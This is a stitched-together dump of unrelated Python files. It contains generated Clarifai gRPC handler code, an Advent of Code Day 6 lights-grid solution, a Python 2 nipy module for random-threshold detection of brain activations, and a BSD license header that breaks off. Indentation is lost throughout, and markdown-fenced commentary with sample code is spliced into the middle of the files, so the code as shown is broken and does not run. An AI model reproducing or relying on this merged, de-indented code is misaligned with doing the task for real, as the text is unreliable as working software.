request_deserializer=proto_dot_clarifai_dot_api_dot_subscription__pb2.GetSubscriptionRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_subscription__pb2.SingleSubscriptionResponse.SerializeToString,
),
'PostSubscription': grpc.unary_unary_rpc_method_handler(
servicer.PostSubscription,
request_deserializer=proto_dot_clarifai_dot_api_dot_subscription__pb2.PostSubscriptionRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_subscription__pb2.SingleSubscriptionResponse.SerializeToString,
),
'GetAppVisualization': grpc.unary_unary_rpc_method_handler(
servicer.GetAppVisualization,
request_deserializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.GetAppVisualizationRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.SingleVisualizationResponse.SerializeToString,
),
'GetVisualization': grpc.unary_unary_rpc_method_handler(
servicer.GetVisualization,
request_deserializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.GetVisualizationRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.SingleVisualizationResponse.SerializeToString,
),
'PostVisualization': grpc.unary_unary_rpc_method_handler(
servicer.PostVisualization,
request_deserializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.PostVisualizationRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.SingleVisualizationResponse.SerializeToString,
),
'ListStatusCodes': grpc.unary_unary_rpc_method_handler(
servicer.ListStatusCodes,
request_deserializer=proto_dot_clarifai_dot_api_dot_code__pb2.ListStatusCodesRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_code__pb2.MultiStatusCodeResponse.SerializeToString,
),
'GetStatusCode': grpc.unary_unary_rpc_method_handler(
servicer.GetStatusCode,
request_deserializer=proto_dot_clarifai_dot_api_dot_code__pb2.GetStatusCodeRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_code__pb2.SingleStatusCodeResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'clarifai.api.V2', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
"""Advent of Code Day 6 - Probably a Fire Hazard"""
import re
# Generate Lights (x, y, 0/1)
lights = []
for x in range(1000):
for y in range(1000):
lights.append([x, y, 0])
with open('inputs/day_06.txt') as f:
instructions = f.readlines()
for instruction in instructions:
# Parse instruction
if 'on' in instruction:
action = 'on'
elif 'off' in instruction:
action = 'off'
if 'toggle' in instruction:
action = 'toggle'
# Isolate coord pairs/coords
coords_regex = re.compile(r'([0-9,]*) through ([0-9,]*)')
first_coords = coords_regex.search(instruction).group(1)
last_coords = coords_regex.search(instruction).group(2)
first_x = int(first_coords.split(',')[0])
last_x = int(last_coords.split(',')[0])
first_y = int(first_coords.split(',')[1])
last_y = int(last_coords.split(',')[1])
# Select specified rectangle
x_offset = last_x - first_x
y_offset = last_y - first_y
for x in range(first_x, first_x + x_offset + 1):
for y in range(first_y, first_y + y_offset + 1):
# Calculate list position
position = x * 1000 + y
if action == 'on':
lights[position] = [x, y, 1]
elif action == 'off':
lights[position] = [x, y, 0]
elif action == 'toggle':
if lights[position][2] == 0:
lights[position] = [x, y, 1]
elif lights[position][2] == 1:
lights[position] = [x, y, 0]
on = 0
for light in lights:
if light[2] == 1:
on += 1
print("Answer One =", on)
lights = []
for x in range(1000):
for y in range(1000):
lights.append([x, y, 0])
for instruction in instructions:
# Parse instruction
if 'on' in instruction:
action = 'on'
elif 'off' in instruction:
action = 'off'
if 'toggle' in instruction:
action = 'toggle'
# Isolate coord pairs/coords
coords_regex = re.compile(r'([0-9,]*) through ([0-9,]*)')
first_coords = coords_regex.search(instruction).group(1)
last_coords = coords_regex.search(instruction).group(2)
first_x = int(first_coords.split(',')[0])
last_x = int(last_coords.split(',')[0])
first_y = int(first_coords.split(',')[1])
last_y = int(last_coords.split(',')[1])
# Select specified rectangle
x_offset = last_x - first_x
y_offset = last_y - first_y
for x in range(first_x, first_x + x_offset + 1):
for y in range(first_y, first_y + y_offset + 1):
# Calculate list position
position = x * 1000 + y
if action == 'on':
brightness = lights[position][2]
lights[position] = [x, y, brightness + 1]
elif action == 'off':
brightness = lights[position][2]
if brightness != 0:
lights[position] = [x, y, brightness - 1]
elif action == 'toggle':
brightness = lights[position][2]
lights[position] = [x, y, brightness + 2]
overall_brightness = 0
for light in lights:
overall_brightness += light[2]
print("Answer Two =", overall_brightness)
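# The nested loops above keep one [x, y, state] triple per light in a flat
# Python list. The same part-one logic can be sketched much more compactly
# with a 2-D NumPy array and slice assignment; `apply_part1` and the sample
# instructions below are illustrative, not part of the real puzzle input.

```python
import re
import numpy as np

COORDS = re.compile(r'(\d+),(\d+) through (\d+),(\d+)')

def apply_part1(grid, instruction):
    """Apply one instruction to a 0/1 light grid (part-one rules)."""
    x0, y0, x1, y1 = map(int, COORDS.search(instruction).groups())
    window = grid[x0:x1 + 1, y0:y1 + 1]   # a view, so writes hit `grid`
    if instruction.startswith('turn on'):
        window[:] = 1
    elif instruction.startswith('turn off'):
        window[:] = 0
    else:  # 'toggle'
        window[:] = 1 - window

grid = np.zeros((1000, 1000), dtype=int)
for line in ['turn on 0,0 through 9,9',
             'toggle 5,5 through 9,9',
             'turn off 0,0 through 1,1']:
    apply_part1(grid, line)
print(grid.sum())  # 100 - 25 - 4 = 71
```

# Part two follows the same shape: replace the three branches with
# `window += 1`, `window[:] = np.maximum(window - 1, 0)` and `window += 2`.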
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
##############################################################################
# Random Thresholding Procedure (after M. Lavielle and C. Ludena)
import numpy as np
import scipy.stats as st
from nipy.algorithms.graph import wgraph_from_3d_grid
from ..group.routines import add_lines
tol = 1e-10
##############################################################################
# Wrappers
def randthresh_main(Y, K, XYZ=None, p=np.inf, varwind=False, knownull=True,
stop=False, verbose=False):
""" Wrapper for random threshold functions
Parameters
==========
Y: array of shape (n,),Observations
K: int, Some positive integer
(lower bound on the number of null hypotheses)
XYZ: array of shape (3, n) voxel coordinates.
If not empty, connexity constraints are used on the non-null set
p: float, optional, lp norm
varwind: bool,
Varying window variant (vs. fixed window, with width K)
knownull: bool, optional,
Known null distribution (observations assumed Exp(1) under H0)
versus unknown (observations assumed Gaussian under H0)
stop: bool, optional
Stop when minimum is attained (save computation time)
verbose: bool, 'Chatty' mode
Returns
=======
A dictionary D containing the following fields:
"C" (n-K) array Lp norm of partial sums fluctuation
about their conditional expectation
"thresh" <float> Detection threshold
"detect" (k,) Index of detected activations
Note
====
Random thresholding is performed only
if null hypothesis of no activations is rejected at level 5%
"""
if XYZ is None:
return randthresh(Y, K, p, stop, verbose, varwind, knownull)
else:
return randthresh_connex(Y, K, XYZ, p, stop, verbose, varwind,
knownull)
def randthresh(Y, K, p=np.inf, stop=False, verbose=False, varwind=False,
knownull=True):
""" Wrapper for random threshold functions (without connexity constraints)
Parameters
==========
Y: array of shape (n,) Observations
K: int,
Some positive integer (lower bound on the number of null hypotheses)
p: float, lp norm
stop <bool> Stop when minimum is attained (save computation time)
verbose <bool> 'Chatty' mode
varwind <bool> Varying window variant (vs. fixed window, with width K)
knownull <bool>
Known null distribution (observations assumed Exp(1) under H0)
versus unknown (observations assumed Gaussian under H0)
Returns
=======
A dictionary D containing the following fields:
"C" (n-K)
Lp norm of partial sums fluctuation about their conditional expectation
"thresh" <float> Detection threshold
"detect" (k,) Index of detected activations
"v" <float> Estimated null variance (if knownull is False)
Note
====
Random thresholding is performed only if
null hypothesis of no activations is rejected at level 5%
"""
D = {}
# Test presence of activity
if knownull:
X = Y
else:
v = np.square(Y).mean()
X = np.clip( - np.log(1 - st.chi2.cdf(Y ** 2, 1, 0, scale=v)), 0,
1 / tol)
D["v"] = v
T = test_stat(X, p=np.inf)
if T <= 0.65:
print "No activity detected at 5% level"
D["detect"] = np.array([])
D["thresh"] = np.inf
else:
# Find optimal threshold
if varwind:
if knownull:
C = randthresh_varwind_knownull(Y, K, p, stop, verbose)
else:
C, V = randthresh_varwind_gaussnull(
Y, K, p, stop, one_sided=False, verbose=verbose)
else:
if knownull:
C = randthresh_fixwind_knownull(Y, K, p, stop, verbose)
else:
C, V = randthresh_fixwind_gaussnull(
Y, K, p, stop, one_sided=False, verbose=verbose)
n = len(X)
if stop:
I = np.where(C > 0)[0]
if len(I) > 0:
ncoeffs = I[-1]
else:
ncoeffs = n - K
else:
I = np.where((C[2:] > C[1:-1]) * (C[1:-1] < C[:-2]))[0]
if len(I) > 0:
ncoeffs = I[np.argmin(C[1: -1][I])] + 1
else:
ncoeffs = n - K
thresh = np.sort(np.abs(Y))[ - ncoeffs]
# Detected activations
detect = np.where(np.abs(Y) > thresh)[0]
D["C"] = C[2:]
D["thresh"] = thresh
D["detect"] = detect
if not knownull:
D["v"] = V[2:]
return D
def randthresh_connex(Y, K, XYZ, p=np.inf, stop=False, verbose=False,
varwind=False, knownull=True):
"""
Wrapper for random threshold functions under connexity constraints
Parameters
==========
Y (n,) Observations
K <int>
Some positive integer (lower bound on the number of null hypotheses)
XYZ (3,n) voxel coordinates
p <float> lp norm
stop <bool> Stop when minimum is attained (save computation time)
verbose <bool> 'Chatty' mode
varwind <bool> Varying window variant (vs. fixed window, with width K)
knownull <bool>
Known null distribution (observations assumed Exp(1) under H0)
versus unknown (observations assumed Gaussian under H0)
Returns
=======
A dictionary D containing the following fields:
"C" (n-K)
Lp norm of partial sums fluctuation about their conditional expectation
"thresh" <float> Detection threshold
"detect" (ncoeffs,) Index of detected voxels
Note
====
Random thresholding is performed only if
null hypothesis of no activations is rejected at level 5%
"""
# Test presence of activity
D = {}
if knownull:
X = Y
else:
v = np.square(Y).mean()
X = np.clip( - np.log(1 - st.chi2.cdf(Y ** 2, 1, 0, scale=v)),
0, 1 / tol)
D["v"] = v
T = test_stat(X, p=np.inf)
if T <= 0.65:
print "No activity detected at 5% level"
D["detect"] = np.array([])
D["thresh"] = np.inf
else:
# Find optimal threshold
if varwind:
if knownull:
C = randthresh_varwind_knownull_connex(
Y, K, XYZ, p, stop, verbose)
else:
C, V = randthresh_varwind_gaussnull_connex(
Y, K, XYZ, p, stop, verbose=verbose)
else:
if knownull:
C = randthresh_fixwind_knownull_connex(
Y, K, XYZ, p, stop, verbose)
else:
C, V = randthresh_fixwind_gaussnull_connex(
Y, K, XYZ, p, stop, verbose=verbose)
n = len(X)
if stop:
I = np.where(C > 0)[0]
if len(I) > 0:
ncoeffs = I[-1]
else:
ncoeffs = n - K
else:
I = np.where((C[2:] > C[1:-1]) * (C[1:-1] < C[:-2]))[0]
if len(I) > 0:
ncoeffs = I[np.argmin(C[1:-1][I])] + 1
else:
ncoeffs = n - K
thresh = np.sort(np.abs(Y))[ - ncoeffs]
detect = np.where(np.abs(Y) > thresh)[0]
# Remove isolated voxels
iso = isolated(XYZ[:, detect])
detect[iso] = -1
detect = detect[detect != -1]
D["C"] = C[2:]
D["thresh"] = thresh
D["detect"] = detect
if not knownull:
Ynull = np.square(Y).copy()
Ynull[detect] = np.nan
Ynull = Ynull[np.isnan(Ynull) == False]
D["v"] = V[2:]
return D
#########################################################################
# random threshold functions without connexity constraints
def randthresh_fixwind_knownull(X, K, p=np.inf, stop=False, verbose=False):
"""Random threshold with fixed-window and known null distribution
Parameters
==========
X (n,): Observations (must be Exp(1) under H0)
K <int>:
Some positive integer (lower bound on the number of null hypotheses)
p <float>: Lp norm
stop <bool>: Stop when minimum is attained (save computation time)
Returns
=======
C (n-K):
Lp norm of partial sums fluctuation about their conditional expectation
"""
n = len(X)
I = 1.0 / np.arange(1, n + 1)
# Sort data
sortX = np.sort(X)[:: - 1]
C = np.zeros(n - K, float)
T = np.cumsum(sortX)
for k in xrange(2, n - K):
#Ratio of expectations
B = np.arange(1, K + 1) * (1 + I[:n - 1 - k].sum() - I[:K].cumsum())
B /= float(K) * ( 1 + I[K: n - 1 - k].sum() )
#Partial sums
Tk = T[k + 1: k + K + 1] - T[k]
#Conditional expectations
Q = B * Tk[-1]
if p == np.inf:
C[k] = np.abs(Tk - Q).max() / np.sqrt(n)
else:
C[k] = ( np.abs(Tk - Q) ** p ).sum() / n ** (p / 2.0 + 1)
if verbose:
print "k :", k, "C[k]:", C[k]
if C[k] > C[k - 1] and C[k - 1] < C[k - 2] and stop:
break
return C
def randthresh_varwind_knownull(X, K, p=np.inf, stop=False, verbose=False):
"""Random threshold with varying window and known null distribution
Parameters
==========
X (n,): Observations (Exp(1) under H0)
K <int>:
Some positive integer (lower bound on the number of null hypotheses)
p <float>: lp norm
stop <bool>: Stop when minimum is attained (save computation time)
Returns
=======
C (n-K)
Lp norm of partial sums fluctuation about their conditional expectation
"""
n = len(X)
I = 1.0 / np.arange(1, n + 1)
#Sort data
sortX = np.sort(X)[:: - 1]
T = np.cumsum(sortX)
C = np.zeros(n - K, float)
for k in xrange(2, n - K):
#Ratio of expectations
B = np.arange(1, n - k) * ( 1 + I[:n - 1 - k].sum() -
I[:n - k - 1].cumsum())
B /= float(n - k - 1)
#Partial sums
Tk = T[k + 1:] - T[k]
#Conditional expectations
Q = B * Tk[ - 1]
if p == np.inf:
C[k] = np.abs(Tk - Q).max() / np.sqrt(n - k - 1)
else:
C[k] = ( np.abs(Tk - Q) ** p).sum() / (n - k - 1) ** (p / 2.0 + 1)
if verbose:
print "k:", k, "C[k]:", C[k]
if C[k] > C[k - 1] and C[k - 1] < C[k - 2] and stop:
break
return C
def randthresh_fixwind_gaussnull(Y, K, p=np.inf, stop=False, one_sided=False,
verbose=False):
""" Random threshold with fixed window and null gaussian distribution
Parameters
==========
Y array of shape (n,)
Observations (assumed Gaussian under H0, with unknown variance)
K, int, Some positive integer
(lower bound on the number of null hypotheses)
p, float, lp norm
stop: bool,
Stop when minimum is attained (save computation time)
one_sided: bool,
If nonzero means are positive only (vs. positive or negative)
Returns
=======
C array of shape (n-K)
Lp norm of partial sums fluctuation about their conditional expectation
"""
n = len(Y)
I = 1.0 / np.arange(1, n + 1)
if one_sided:
sortY = np.sort(Y)
std = np.sqrt((np.sum(sortY[1:K] ** 2) + np.cumsum(sortY[K: n] ** 2))\
* 1.0 / np.arange(K, n))
std = std[:: - 1]
else:
sortY = np.sort(np.square(Y))
V = (np.sum(sortY[1: K]) + np.cumsum(sortY[K: n])) * \
1.0 / np.arange(K, n)
V = V[:: - 1]
C = np.zeros(n - K, float)
sortY = sortY[:: - 1]
for k in xrange(2, n - K):
if one_sided:
X = np.clip( - np.log(1 - st.norm.cdf(sortY[k + 1: k + K + 1],
scale=std[k])), 0, 1 / tol)
else:
X = np.clip( -
np.log(1 - st.chi2.cdf(sortY[k + 1: k + K + 1],
1, 0, scale=V[k])), 0, 1 / tol)
# Ratio of expectations
B = np.arange(1, K + 1) * (1 + I[:n - 1 - k].sum() - I[: K].cumsum())
B /= float(K) * (1 + I[K: n - 1 - k].sum())
# Partial sums
T = X.cumsum()
# Conditional expectations
Q = B * T[-1]
if p == np.inf:
C[k] = np.abs(T - Q).max() / np.sqrt(n)
else:
C[k] = ( np.abs(T - Q) ** p ).sum() / n ** ( p / 2.0 + 1)
if verbose:
print "k:", k, "C[k]:", C[k]
if C[k] > C[k-1] and C[k-1] < C[k-2] and stop:
break
return C, V
def randthresh_varwind_gaussnull(Y, K, p=np.inf, stop=False, one_sided=False,
verbose=False):
"""Random threshold with varying window and gaussian null distribution
Parameters
==========
Y (n,) Observations (assumed Gaussian under H0, with unknown variance)
K <int>
Some positive integer (lower bound on the number of null hypotheses)
p <float> lp norm
stop <bool> Stop when minimum is attained (save computation time)
one_sided <bool>
If nonzero means are positive only (vs. positive or negative)
Returns
=======
C (n-K)
Lp norm of partial sums fluctuation about their conditional expectation
"""
n = len(Y)
I = 1.0 / np.arange(1, n + 1)
if one_sided:
sortY = np.sort(Y)
std = np.sqrt((np.sum(sortY[1: K] ** 2) + np.cumsum(sortY[K: n] ** 2))
* 1.0 / np.arange(K, n))
std = std[:: - 1]
else:
sortY = np.sort(np.square(Y))
V = (np.sum(sortY[1: K]) + np.cumsum(sortY[K: n]))\
* 1.0 / np.arange(K, n)
V = V[:: - 1]
C = np.zeros(n - K, float)
sortY = sortY[:: - 1]
for k in xrange(2, n - K):
if one_sided:
X = np.clip( - np.log(1 - st.norm.cdf(sortY[k + 1:],
scale=std[k])), 0, 1 / tol)
else:
X = np.clip( -
np.log(1 - st.chi2.cdf(sortY[k + 1:], 1, 0, scale=V[k])), 0,
1 / tol)
# Ratio of expectations
B = np.arange(1, n - k) * ( 1 + I[: n - 1 - k].sum() - \
I[: n - k - 1].cumsum() )
B /= float(n - k - 1)
# Partial sums
T = X.cumsum()
# Conditional expectations
Q = B * T[ - 1]
if p == np.inf:
C[k] = np.abs(T - Q).max() / np.sqrt(n)
else:
C[k] = ( np.abs(T - Q) ** p ).sum() / n ** (p / 2.0 + 1)
if verbose:
print "k:", k, "C[k]:", C[k]
if C[k] > C[k - 1] and C[k - 1] < C[k - 2] and stop:
break
return C, V
###############################################################################
# random threshold functions with connexity constraints
def randthresh_fixwind_knownull_connex(X, K, XYZ, p=np.inf, stop=False,
verbose=False):
"""Random threshold with fixed-window and known null distribution,
using connexity constraint on non-null set.
Parameters
==========
X (n,): Observations (must be Exp(1) under H0)
XYZ (3,n): voxel coordinates
K <int>:
Some positive integer (lower bound on the number of null hypotheses)
p <float>: Lp norm
stop <bool>: Stop when minimum is attained (save computation time)
Returns
=======
C (n-K):
Lp norm of partial sums fluctuation about their conditional expectation
"""
n = len(X)
I = 1.0 / np.arange(1, n + 1)
#Sort data
J = np.argsort(X)[:: - 1]
sortX = X[J]
C = np.zeros(n - K, float)
T = np.zeros(K, float)
L = np.zeros(n, int)
L[J[0]] = 1
for k in xrange(2, n - K):
#Ratio of expectations
B = np.arange(1, K + 1) * (1 + I[: n - 1 - k].sum() - I[: K].cumsum())
B /= float(K) * ( 1 + I[K: n - 1 - k].sum() )
Jk = J[:k]
#Suprathreshold voxels connected to new voxel
XYZk = np.abs(XYZ[:, Jk] - XYZ[:, J[k - 1]].reshape(3, 1))
Lk = np.where((XYZk.sum(axis=0) <= 2) * (XYZk.max(axis=0) <= 1))[0]\
[: - 1]
if len(Lk) == 0:
L[J[k - 1]] = 1
else:
L[J[Lk]] = 0
Ik = np.where(L[Jk] == 1)[0]
nk = len(Ik)
#Partial sums
if nk >= K:
T = sortX[Ik[:K]].cumsum()
elif nk == 0:
T = sortX[k + 1: k + K + 1].cumsum()
else:
T[:nk] = sortX[Ik].cumsum()
T[nk:] = T[nk - 1] + sortX[k + 1:k + K - nk + 1].cumsum()
# Conditional expectations
Q = B * T[-1]
if p == np.inf:
C[k] = np.abs(T - Q).max() / np.sqrt(n)
else:
C[k] = (np.abs(T - Q) ** p).sum() / n ** (p / 2.0 + 1)
if verbose:
print "k:", k, "nk:", nk, "C[k]:", C[k]
if C[k] > C[k - 1] and C[k - 1] < C[k - 2] and stop:
break
return C
def randthresh_varwind_knownull_connex(X, K, XYZ, p=np.inf, stop=False,
verbose=False):
"""Random threshold with varying window and known null distribution
Parameters
==========
X (n,): Observations (Exp(1) under H0)
K <int>:
Some positive integer (lower bound on the number of null hypotheses)
XYZ (3,n): voxel coordinates
p <float>: lp norm
stop <bool>: Stop when minimum is attained (save computation time)
Returns
=======
C (n-K)
Lp norm of partial sums fluctuation about their conditional expectation
"""
n = len(X)
I = 1.0 / np.arange(1, n + 1)
#Sort data
J = np.argsort(X)[:: - 1]
sortX = X[J]
C = np.zeros(n - K, float)
L = np.zeros(n, int)
L[J[0]] = 1
for k in xrange(2, n - K):
Jk = J[:k]
#Suprathreshold voxels connected to new voxel
XYZk = np.abs(XYZ[:, Jk] - XYZ[:, J[k-1]].reshape(3, 1))
Lk = np.where((XYZk.sum(axis=0) <= 2) * (XYZk.max(axis=0) <= 1))\
[0][:-1]
if len(Lk) == 0:
L[J[k - 1]] = 1
else:
L[J[Lk]] = 0
Ik = np.where(L[Jk] == 1)[0]
#Ik = isolated(XYZ[:, Jk])
nk = len(Ik)
#Ratio of expectations
B = np.arange(1, n - k + nk) * ( 1 + I[:n - 1 - k + nk].sum() -
I[:n - k - 1 + nk].cumsum())
B /= float(n - k - 1 + nk)
#Partial sums
if nk == 0:
T = sortX[k + 1:].cumsum()
else:
T = np.zeros(n - k + nk - 1, float)
T[:nk] = sortX[Ik].cumsum()
T[nk:] = T[nk - 1] + sortX[k + 1:].cumsum()
#Conditional expectations
Q = B * T[-1]
if p == np.inf:
C[k] = np.abs(T - Q).max() / np.sqrt(n - k - 1 + nk)
else:
C[k] = ( np.abs(T - Q) ** p ).sum() / (n - k - 1 + nk) **\
(p / 2.0 + 1)
if C[k] > C[k - 1] and C[k - 1] < C[k - 2] and stop:
break
if verbose:
print "k:", k, "nk:", nk, "C[k]:", C[k]
return C
def randthresh_fixwind_gaussnull_connex(X, K, XYZ, p=np.inf, stop=False,
verbose=False):
"""Random threshold with fixed-window and gaussian null distribution,
using connexity constraint on non-null set.
Parameters
==========
X (n,): Observations (assumed Gaussian under H0)
XYZ (3,n): voxel coordinates
K <int>:
Some positive integer (lower bound on the number of null hypotheses)
p <float>: Lp norm
stop <bool>: Stop when minimum is attained (save computation time)
Returns
=======
C (n-K):
Lp norm of partial sums fluctuation about their conditional expectation
"""
n = len(X)
I = 1.0 / np.arange(1, n + 1)
#Sort data
J = np.argsort(X ** 2)[:: - 1]
sortX = np.square(X)[J]
C = np.zeros(n - K, float)
V = np.zeros(n - K, float)
T = np.zeros(K, float)
L = np.zeros(n, int)
L[J[0]] = 1
for k in xrange(2, n - K):
#Ratio of expectations
B = np.arange(1, K + 1) * ( 1 + I[:n - 1 - k].sum() - I[:K].cumsum())
B /= float(K) * ( 1 + I[K:n - 1 - k].sum())
Jk = J[:k]
#Suprathreshold voxels connected to new voxel
XYZk = np.abs(XYZ[:, Jk] - XYZ[:, J[k - 1]].reshape(3, 1))
Lk = np.where((XYZk.sum(axis=0) <= 2) *
(XYZk.max(axis=0) <= 1))[0][: - 1]
if len(Lk) == 0:
L[J[k - 1]] = 1
else:
L[J[Lk]] = 0
Ik = np.where(L[Jk] == 1)[0]
nk = len(Ik)
#Null variance
V[k] = (sortX[Ik].sum() + sortX[k + 1:].sum()) / float(nk + n - k - 1)
#Partial sums
if nk >= K:
T = np.clip( - np.log(1 - st.chi2.cdf(
sortX[Ik[:K]], 1, 0, scale=V[k])), 0, 1 / tol).cumsum()
elif nk == 0:
T = np.clip( -
np.log(1 - st.chi2.cdf(sortX[k + 1:k + K + 1], 1, 0,
scale=V[k])), 0, 1 / tol).cumsum()
else:
T[:nk] = np.clip( -
np.log(1 - st.chi2.cdf(sortX[Ik], 1, 0, scale=V[k])), 0,
1 / tol).cumsum()
T[nk:] = T[nk - 1] + np.clip( -
np.log(1 - st.chi2.cdf(sortX[k + 1:k + K - nk + 1], 1, 0,
scale=V[k])), 0, 1 / tol).cumsum()
# Conditional expectations
Q = B * T[ - 1]
if p == np.inf:
C[k] = np.abs(T - Q).max() / np.sqrt(n)
else:
C[k] = (np.abs(T - Q) ** p).sum() / n ** (p / 2.0 + 1)
if verbose:
print "k:", k, "nk:", nk, "C[k]:", C[k]
if C[k] > C[k - 1] and C[k - 1] < C[k - 2] and stop:
break
return C, V
def randthresh_varwind_gaussnull_connex(X, K, XYZ, p=np.inf, stop=False,
verbose=False):
"""Random threshold with varying window and gaussian null distribution,
using connexity constraint on non-null set.
Parameters
==========
X (n,): Observations (assumed Gaussian under H0)
XYZ (3,n): voxel coordinates
K <int>:
Some positive integer (lower bound on the number of null hypotheses)
p <float>: Lp norm
stop <bool>: Stop when minimum is attained (save computation time)
Returns
=======
C (n-K):
Lp norm of partial sums fluctuation about their conditional expectation
"""
n = len(X)
I = 1.0 / np.arange(1, n + 1)
#Sort data
J = np.argsort(X ** 2)[:: - 1]
sortX = np.square(X)[J]
C = np.zeros(n - K, float)
V = np.zeros(n - K, float)
T = np.zeros(K, float)
L = np.zeros(n, int)
L[J[0]] = 1
for k in xrange(2, n - K):
Jk = J[:k]
#Suprathreshold voxels connected to new voxel
XYZk = np.abs(XYZ[:, Jk] - XYZ[:, J[k - 1]].reshape(3, 1))
Lk = np.where((XYZk.sum(axis=0) <= 2) *
(XYZk.max(axis=0) <= 1))[0][: - 1]
if len(Lk) == 0:
L[J[k - 1]] = 1
else:
L[J[Lk]] = 0
Ik = np.where(L[Jk] == 1)[0]
#Ik = isolated(XYZ[:, Jk])
nk = len(Ik)
#Ratio of expectations
B = np.arange(1, n - k + nk) * ( 1 + I[:n - 1 - k + nk].sum() -
I[:n - k - 1 + nk].cumsum())
B /= float(n - k - 1 + nk)
#Null variance
V[k] = (sortX[Ik].sum() + sortX[k + 1:].sum()) / float(nk + n - k - 1)
#Partial sums
if nk == 0:
T = np.clip( -
np.log(1 - st.chi2.cdf(sortX[k + 1:], 1, 0, scale=V[k])), 0,
1 / tol).cumsum()
else:
T = np.zeros(n - k + nk - 1, float)
T[:nk] = np.clip( -
np.log(1 - st.chi2.cdf(sortX[Ik], 1, 0, scale=V[k])), 0,
1 / tol).cumsum()
T[nk:] = T[nk-1] + np.clip( -
np.log(1 - st.chi2.cdf(sortX[k + 1:], 1, 0, scale=V[k])), 0,
1 / tol).cumsum()
#Conditional expectations
Q = B * T[-1]
if p == np.inf:
C[k] = np.abs(T - Q).max() / np.sqrt(n - k - 1 + nk)
else:
C[k] = ( np.abs(T - Q) ** p).sum() / \
(n - k - 1 + nk) ** (p / 2.0 + 1)
if verbose:
print "k:", k, "nk:", nk, "C[k]:", C[k]
if C[k] > C[k - 1] and C[k - 1] < C[k - 2] and stop:
break
return C, V
#############################################################################
# Miscellaneous functions
def test_stat(X, p=np.inf):
"""Test statistic of global null hypothesis
that all observations have zero-mean
Parameters
==========
X (n,) : X[j] = -log(1-F(|Y[j]|))
where F: cdf of |Y[j]| under null hypothesis
(must be computed beforehand)
p : Lp norm (<= inf) to use for computing test statistic
Returns
=======
D <float> : test statistic
"""
n = len(X)
I = 1.0 / np.arange(1, n + 1)
#Partial sums
T = np.cumsum(np.sort(X)[:: - 1])
#Expectation of partial sums
E = np.arange(1, n + 1) * (1 + I.sum() - I.cumsum())
#Conditional expectation of partial sums
Q = E / n * T[ - 1]
#Test statistic
if p == np.inf:
return np.max( ( np.abs(T - Q) ) / np.sqrt(n) )
else:
return sum(np.abs(T - Q) ** p) / (n ** (0.5 * p + 1))
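# The test statistic above can be exercised in isolation. The block below is
# a standalone replica of `test_stat` (same partial sums T, expectation E and
# conditional expectation Q), run on a seeded Exp(1) sample, i.e. the assumed
# null distribution. The name `partial_sum_stat` is illustrative only.

```python
import numpy as np

def partial_sum_stat(X, p=np.inf):
    # Standalone replica of test_stat, for a quick sanity check.
    n = len(X)
    I = 1.0 / np.arange(1, n + 1)
    T = np.cumsum(np.sort(X)[::-1])                     # partial sums, largest first
    E = np.arange(1, n + 1) * (1 + I.sum() - I.cumsum())  # expected partial sums
    Q = E / n * T[-1]                                   # conditional expectation
    if p == np.inf:
        return np.abs(T - Q).max() / np.sqrt(n)
    return np.sum(np.abs(T - Q) ** p) / n ** (0.5 * p + 1)

rng = np.random.RandomState(0)
X_null = rng.exponential(1.0, size=2000)   # pure-noise sample under H0
stat_inf = partial_sum_stat(X_null)
stat_2 = partial_sum_stat(X_null, p=2)
print(stat_inf, stat_2)
```

# The wrappers above treat values of the sup-norm statistic above roughly
# 0.65 as evidence of activity; a pure-noise sample like this one typically
# stays below that critical level.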
def isolated(XYZ, k=18):
"""
Outputs an index I of isolated points from their integer coordinates,
XYZ (3, n), and under k-connectivity, k = 6, 18 or 26.
"""
label = wgraph_from_3d_grid(XYZ.T, k).cc()
# Isolated points
ncc = label.max() + 1
p = XYZ.shape[1]
size = np.zeros(ncc, float)
ones = np.ones((p, 1), float)
add_lines(ones, size.reshape(ncc, 1), label)
return np.where(size[label] == 1)[0]
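# `isolated` above relies on nipy's wgraph_from_3d_grid to label connected
# components. For intuition, here is a dependency-free brute-force sketch of
# the same 18-connectivity test used throughout this module (max coordinate
# difference 1, sum of differences at most 2); `isolated_bruteforce` and the
# sample points are illustrative only.

```python
import numpy as np

def isolated_bruteforce(XYZ):
    """Indices of points in XYZ (3, n) with no 18-connected neighbour."""
    XYZ = np.asarray(XYZ)
    n = XYZ.shape[1]
    iso = []
    for i in range(n):
        d = np.abs(XYZ - XYZ[:, i:i + 1])
        # 18-connectivity: Chebyshev distance exactly 1 (this also excludes
        # the point itself) and at most two axes differing.
        neigh = (d.max(axis=0) == 1) & (d.sum(axis=0) <= 2)
        if not neigh.any():
            iso.append(i)
    return np.array(iso)

pts = np.array([[0, 1, 5],
                [0, 0, 5],
                [0, 0, 5]])   # two adjacent voxels and one far away
print(isolated_bruteforce(pts))  # [2]
```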
"""
Run to generate figures for presentation.
Requires TeX; may need to install texlive-extra-utils on linux
Requires xppy and Py_XPPCall
the main() function at the end calls the preceding individual figure functions.
figures are saved as both png and pdf.
Copyright (c) 2016, Youngmin Park, Bard Ermentrout
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
